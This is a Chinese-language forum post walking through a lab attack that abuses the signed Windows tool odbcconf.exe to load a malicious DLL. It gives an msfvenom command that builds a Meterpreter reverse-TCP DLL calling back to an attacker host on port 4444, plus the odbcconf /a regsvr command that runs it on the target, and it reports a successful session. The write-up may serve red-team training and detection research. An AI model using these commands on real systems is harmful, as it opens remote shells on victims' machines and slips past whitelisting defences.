本帖最后由 wholesome 于 2020-3-31 20:31 编辑
一、Odbcconf.exe介绍 Odbcconf.exe是一个命令行工具,可让您配置ODBC驱动程序和数据源名称(微软官方文档https://docs.microsoft.com/en-us ... ew=sql-server-ver15)。
Odbcconf.exe在windows中的的一般路径为C:\Windows\System32\odbcconf.exe C:\Windows\SysWOW64\odbcconf.exe
通过文档可发现有两种方式来加载dll,/A和/F
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZEdkxpYUJpY0F4MkNqelRmdlYxelhhZTFQUnU2ZmhGMEZxMnNOYlNYdmljQmdhTXNyTnpMR2xxYUEvNjQw?x-oss-process=image/format,png)
二、利用Odbcconf.exe执行payload法 攻击机:kali ip地址:192.168.10.130
靶机:win7 ip地址:192.168.10.135
使用msfvenom生成shellcode,注意生成的是dll格式
- msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f dll > hacker.dll
复制代码![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZVa0xQWE1JY2RaQmlhSVQ5cGlhUnB2M1RuYU90S1duN0RsZmljYnJ2WlFqU2lib0NmWU82cVpobnVRLzY0MA?x-oss-process=image/format,png)
设置监听:
靶机运行payload:
- odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}
复制代码![](https://img-blog.csdnimg.cn/20200331202444397.gif)
成功上线:
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZFRFlWWFYyaWFkYVZORUMwZWljMnVnV29mTHhWNkR0dWF4b05Rclc0MTAxRmZweXJjSnB5Q2NUdy82NDA?x-oss-process=image/format,png)
这个也被杀软盯上了,行为检测预警。
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZSWUVFZm5CTmlhWFRWOTlWQzZXM0I2a2ljTnpkUVNDZ0VENzhzbWJjalZ0ckgyUlZLUnNUTEsyZy82NDA?x-oss-process=image/format,png)
三、参考资料 基于白名单Odbcconf执行payload:https://micro8.github.io/Micro8- ... BA%8C%E5%AD%A3.html
|